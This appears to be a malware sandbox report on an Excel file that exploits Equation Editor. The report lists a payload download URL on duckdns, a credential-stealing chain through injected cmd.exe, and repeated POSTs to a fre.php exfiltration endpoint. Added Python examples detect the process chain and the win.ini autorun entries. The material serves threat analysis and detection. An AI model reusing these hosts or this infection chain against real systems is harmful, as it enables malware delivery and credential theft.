- Estimated result
- Detected: malicious behavior
- Size
- 781.0 KB
- Format
- xlsx
- SHA1
- 1f751047797521b875c0c667ce17883db99cd1e1
- Report date
- 1579140246486.8745 (Unix time in milliseconds: 2020-01-16 02:04:06 UTC)
- Analysis started
- 1579140246147.016 (Unix time in milliseconds: 2020-01-16 02:04:06 UTC)
- Use of VNC
- No
- Command to run the file
- Not specified
Behavior
- malicious
- Creating a process from a recently created file
- Enabling autorun with system ini files
- Sending an HTTP POST request to a potentially dangerous server
- suspicious
- Sending an HTTP GET request
- Launching a file downloaded from the Internet
- Forced shutdown of a system process
- Unauthorized injection to a system process
- Stealing user critical data
- Connection attempt to a potentially dangerous server
- neutral
- Creating a window
- Launching a process
- DNS request
- Creating a file in the %AppData% directory
- Creating a file in the %temp% directory
- Creating a file
- Delayed writing of the file
- Launching cmd.exe command interpreter
- Deleting a recently created file
- Reading critical registry keys
- Launching a service
- Changing a file
- Replacing files
- Creating a file in the %AppData% subdirectories
- Enabling the 'hidden' option for recently created files
Process graph
- (graph image not extracted; legend: sample, known threat, process creation, injection, web query, RPC request, process maliciousness)
- PID
- 2948
- Full path
- %ProgramFiles%\microsoft office\office14\excel.exe
- Run parameters
- /dde
- Behavior
- Creating a window
- PID
- 552
- Full path
- <SYSTEM32>\svchost.exe
- Run parameters
- -k DcomLaunch
- Behavior
- Launching a process
- PID
- 276
- Full path
- <SYSTEM32>\svchost.exe
- Run parameters
- -k NetworkService
- Behavior
- DNS request
- PID
- 1396
- Full path
- %CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe
- Run parameters
- -Embedding
- Behavior
- Sending an HTTP GET request, Creating a file in the %AppData% directory, Launching a file downloaded from the Internet, Creating a process from a recently created file
- PID
- 1392
- Full path
- %APPDATA%\vbc.exe
- Behavior
- Creating a file in the %temp% directory, Creating a file, Creating a process from a recently created file, Deleting a recently created file
- PID
- 2624
- Full path
- %TEMP%\norway.exe
- Behavior
- Enabling autorun with system ini files, Delayed writing of the file, Forced shutdown of a system process, Unauthorized injection to a system process, Launching cmd.exe command interpreter
- PID
- 1072
- Full path
- %WINDIR%\syswow64\cmd.exe
- Run parameters
- "<SYSTEM32>\cmd.exe"
- Behavior
- Reading critical registry keys, Stealing user critical data, Changing a file, Replacing files, Connection attempt to a potentially dangerous server, Sending an HTTP POST request to a potentially dangerous server, Creating a file in the %AppData% subdirectories, Deleting a recently created file, Enabling the 'hidden' option for recently created files
- PID
- 412
- Full path
- <SYSTEM32>\services.exe
- Behavior
- Launching a service
- PID
- 428
- Full path
- <SYSTEM32>\lsass.exe
- Behavior
- Creating a file
- PID
- 1320
- Full path
- %WINDIR%\syswow64\cmd.exe
- Behavior
- (none recorded)
- PID
- 1028
- Full path
- %WINDIR%\explorer.exe
- Behavior
- (none recorded)
- PID
- 332
- Full path
- <SYSTEM32>\wininit.exe
- Behavior
- (none recorded)
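The process list above carries no parent links, but the per-process behaviour text and the Description section pin down the chain that matters: Equation Editor (eqnedt32.exe, COM-activated with -Embedding) fetches vbc.exe into %APPDATA% and runs it, vbc.exe drops norway.exe into %TEMP% and runs it, and norway.exe injects into a cmd.exe that then reads credential stores and POSTs them out. The following is an added example written for this page, not part of the sandbox report or its tooling: it encodes those three links as parent/child rules over process records. The parent PIDs in the sample records are inferred as described, and the extra Office host and shell names in the constant sets are assumptions.

```python
"""Process-chain rules over the process list in this report.

Added example, not part of the sandbox report. The report gives no parent
PIDs; the parent links below are inferred from the per-process behaviour
text and the Description section (eqnedt32.exe downloads and runs vbc.exe,
vbc.exe drops and runs norway.exe, norway.exe injects into and launches
cmd.exe) and from the "-Embedding" switch, which means Equation Editor was
COM-activated through the DcomLaunch svchost.
"""
import ntpath
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Assumption: names beyond excel.exe/eqnedt32.exe/cmd.exe are added for generality.
OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe", "eqnedt32.exe"}
USER_WRITABLE = ("%appdata%", "%localappdata%", "%temp%")
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass
class Proc:
    pid: int
    path: str
    ppid: Optional[int] = None
    args: str = ""
    behavior: Tuple[str, ...] = ()

    @property
    def name(self) -> str:
        return ntpath.basename(self.path).lower()

    @property
    def user_writable(self) -> bool:
        return self.path.lower().startswith(USER_WRITABLE)


# PIDs, paths and behaviour strings mirror the report; ppid is inferred (see above).
SAMPLE_TREE: List[Proc] = [
    Proc(2948, r"%ProgramFiles%\microsoft office\office14\excel.exe", None, "/dde"),
    Proc(552, r"<SYSTEM32>\svchost.exe", None, "-k DcomLaunch", ("Launching a process",)),
    Proc(1396, r"%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe", 552, "-Embedding",
         ("Sending an HTTP GET request", "Creating a process from a recently created file")),
    Proc(1392, r"%APPDATA%\vbc.exe", 1396, "",
         ("Creating a file in the %temp% directory", "Creating a process from a recently created file")),
    Proc(2624, r"%TEMP%\norway.exe", 1392, "",
         ("Enabling autorun with system ini files", "Unauthorized injection to a system process",
          "Launching cmd.exe command interpreter")),
    Proc(1072, r"%WINDIR%\syswow64\cmd.exe", 2624, r'"<SYSTEM32>\cmd.exe"',
         ("Stealing user critical data", "Sending an HTTP POST request to a potentially dangerous server")),
]


def find_chains(procs: List[Proc]) -> List[Tuple[str, int]]:
    """Return (rule, child_pid) findings for the three chain links seen in the report."""
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        parent = by_pid.get(p.ppid)
        if parent is None:
            continue
        # Link 1: an Office host (here Equation Editor) spawning anything from a
        # user-writable directory. This is the exploit-to-payload step.
        if parent.name in OFFICE_HOSTS and p.user_writable:
            findings.append(("office_spawns_user_writable_exe", p.pid))
        # Link 2: a user-writable executable launching another one (dropper -> payload).
        if parent.user_writable and p.user_writable:
            findings.append(("dropper_spawns_payload", p.pid))
        # Link 3: a user-writable executable launching a shell; with the injection
        # behaviour on the parent this is the hollowed cmd.exe that exfiltrates.
        if parent.user_writable and p.name in SHELLS:
            findings.append(("user_writable_exe_spawns_shell", p.pid))
    return findings


def exfil_from_injected_shell(procs: List[Proc]) -> List[int]:
    """PIDs of shells whose recorded behaviour includes an HTTP POST: cmd.exe has no
    business posting data, so the POST itself is the indicator, whatever was injected."""
    return [p.pid for p in procs
            if p.name in SHELLS and any("HTTP POST" in b for b in p.behavior)]
```

The three rules fire independently, so a tree missing one link (for example, if the sandbox lost the vbc.exe to norway.exe edge) still produces the other two findings; on a real EDR feed replace SAMPLE_TREE with records that carry genuine parent PIDs.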
- Address
- <DNS_SERVER> (8.8.8.8)
- Port
- 53
- Protocol level
- Transport: UDP, Application: DNS
- Query
- ASK nationafourlindustrialandgooglednsline.duckdns.org
- Address
- nationafourlindustrialandgooglednsline.duckdns.org (23.249.162.173)
- Port
- 80
- Protocol level
- Transport: TCP, Application: HTTP
- URL
- GET http://nationafourlindustrialandgooglednsline.duckdns.org/secure/vbc.exe
- Address
- 107.175.150.73
- Port
- 80
- Protocol level
- Transport: TCP, Application: HTTP
- URL
- POST http://107.175.150.73/~giftioz/.golob/fre.php
- Address
- 107.175.150.73
- Port
- 80
- Protocol level
- Transport: TCP, Application: HTTP
- URL
- POST http://107.175.150.73/~giftioz/.golob/fre.php
- Address
- 107.175.150.73
- Port
- 80
- Protocol level
- Transport: TCP, Application: HTTP
- URL
- POST http://107.175.150.73/~giftioz/.golob/fre.php
Description
To ensure autorun and distribution
Creates or modifies the following files
- %WINDIR%\win.ini
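The report records only that %WINDIR%\win.ini was modified for autorun; the relevant entries in that file are the legacy load= and run= keys of its [windows] section, which Windows maps through IniFileMapping to the Load and Run values under HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows. The added example below (written for this page, not taken from the report) parses a win.ini and returns every non-empty load=/run= entry, flagging those that point into user-writable directories. The sample file content and the payload path it references are constructed assumptions, not values recorded by the sandbox.

```python
"""Check win.ini for the legacy [windows] load= / run= autostart entries.

Added example, not part of the sandbox report. The report only says
%WINDIR%\\win.ini was modified; the sample content below is constructed, and
the path it assigns to load= is an assumption chosen from the hidden file the
report lists, not a value the sandbox recorded.
"""
import re
from typing import Dict, List, Tuple

AUTOSTART_KEYS = ("load", "run")
# Raw-string trick is avoided on purpose: a raw string cannot end in a backslash.
USER_WRITABLE = ("%appdata%", "%localappdata%", "%temp%", "c:\\users\\")

# Constructed sample: a default-looking win.ini with one autostart entry appended.
SAMPLE_WIN_INI = """\
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[windows]
load=%APPDATA%\\e6f983\\35a09b.exe
run=
"""


def parse_ini(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI reader: {section: {key: value}}, case-insensitive names,
    tolerant of comment lines and of sections with no key/value pairs."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        m = re.match(r"^\[(.+?)\]$", line)
        if m:
            current = m.group(1).lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def autostart_entries(text: str) -> List[Tuple[str, str, bool]]:
    """Return (key, target, points_into_user_writable_dir) for each non-empty
    load=/run= entry under [windows]. An empty value is the normal, benign state."""
    windows = parse_ini(text).get("windows", {})
    out = []
    for key in AUTOSTART_KEYS:
        target = windows.get(key, "").strip('"')
        if target:
            out.append((key, target, target.lower().startswith(USER_WRITABLE)))
    return out
```

On a live host read the file from %WINDIR%\win.ini and, because of the INI-to-registry mapping, also check the Load and Run values under HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows, which is where the entry actually takes effect.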
Malicious functions
Creates and executes the following
- '' (downloaded from the Internet)
Creates and executes the following (exploit)
- '%APPDATA%\vbc.exe'
Injects code into
the following system processes:
- %WINDIR%\syswow64\cmd.exe
Terminates or attempts to terminate
the following system processes:
- %WINDIR%\syswow64\cmd.exe
Reads files which store third party applications passwords
- %APPDATA%\opera software\opera stable\login data
- %APPDATA%\thunderbird\profiles.ini
Modifies file system
Creates the following files
- %APPDATA%\vbc.exe
- %TEMP%\$rptsprg9mref
- %TEMP%\relax-ng-compact-syntax.xml
- %TEMP%\trapezium
- %TEMP%\norway.exe
- %TEMP%\whorehouse.dll
- %TEMP%\nsze666.tmp\userinfo.dll
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
- %APPDATA%\e6f983\35a09b.hdb
- %APPDATA%\e6f983\35a09b.lck
- %APPDATA%\e6f983\35a09b.exe
Sets the 'hidden' attribute to the following files
- %APPDATA%\e6f983\35a09b.exe
Deletes the following files
- %TEMP%\nsze666.tmp\userinfo.dll
- %APPDATA%\e6f983\35a09b.lck
Substitutes the following files
- %APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-1960123792-2022915161-3775307078-1001\f58155b4b1d5a524ca0261c3ee99fb50_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
Network activity
Connects to
- '107.175.150.73':80
TCP
HTTP GET requests
- http://nationafourlindustrialandgooglednsline.duckdns.org/secure/vbc.exe
HTTP POST requests
- http://107.175.150.73/~giftioz/.golob/fre.php
UDP
- DNS ASK nationafourlindustrialandgooglednsline.duckdns.org
Miscellaneous
Creates and executes the following
- '%TEMP%\norway.exe'
Executes the following
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\cmd.exe'
- API log [0]
- (no API events recorded)
Network activity map
- (map not extracted; no connection data beyond the entries listed under Network activity)